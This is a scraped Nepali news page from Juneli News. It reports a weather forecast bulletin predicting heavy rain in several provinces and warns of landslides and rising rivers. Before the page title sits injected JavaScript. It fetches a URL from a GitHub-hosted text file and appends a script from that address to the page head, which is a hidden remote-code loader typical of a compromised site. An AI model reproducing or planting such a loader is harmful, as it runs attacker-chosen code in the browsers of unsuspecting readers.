;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); मौसम पुर्वानुमान महाशाखाका अनुसार आज देशका धेरै स्थानमा भारि वर्षा हुने सम्भावना – जुनेली न्युज
आइतवार, बैशाख ८, २०८२
  • होमपेज
  • मौसम पुर्वानुमान महाशाखाका अनुसार आज देशका धेरै स्थानमा भारि वर्षा हुने सम्भावना
Breaking News

मौसम पुर्वानुमान महाशाखाका अनुसार आज देशका धेरै स्थानमा भारि वर्षा हुने सम्भावना

जुनेली न्यूज , काठमाडौं ।मौसम पुर्वानिमान महाशाखाका अनुसार आज पनि देशका धेरै स्थानमा भारि वर्षा हुने सम्भावना रहेको छ।महाशाखाका अनुसार यस क्रममा दिउँसो र राति गरी देशका पाँचवटा प्रदेशमा कतै कतै भारी वर्षासमेत हुने सम्भावना देखिएको छ।

बिशेष गरि कर्णाली, लुम्बिनी, गण्डकी र सुदूरपश्चिम प्रदेशका एक दुई स्थानमा भारी वर्षाको सम्भावना पनि हुने सम्भावना छ। महाशाखाले अघि बिहान ६ बजे जारी गरेको मौसम पूर्वानुमान बुलेटिनअनुसार दिउँसो देशका यी  स्थानमा हल्कादेखि मध्यमसम्म वर्षा हुने सम्भावना छ।

यस्तै राति पनि धेरै स्थानमा हल्कादेखि मध्यमसम्म र यस क्रममा प्रदेश १, गण्डकी, लुम्बिनी र सुदूरपश्चिम प्रदेशका एक दुई स्थानमा भने भारी वर्षा हुने सम्भावना रहेको बुलेटिनमा उल्लेख गरिएको छ।

महाशाखाले आगामी २४ घण्टा (सोमबार बिहान ६ बजेसम्म) का लागि चेतावनी तथा परामर्श पनि जारी गरेको छ।

जसमा लेखिएको छ– प्रदेश १, गण्डकी, कर्णाली, लुम्बिनी र सुदूरपश्चिम प्रदेशका एक दुई स्थानमा भारी वर्षाको सम्भावना रहेकाले पहाडी भूभूगामा भूक्षय, पहिरो तथा गेग्रान बहावको जोखिम रहेको हुनाले नदीनाला र खहरे खोलामा पानीको सतह बढ्न सक्ने भएकाले आवश्यक सतर्कता अपनाउन हुन अनुरोध छ।

फेसबुक प्रतिक्रियाहरु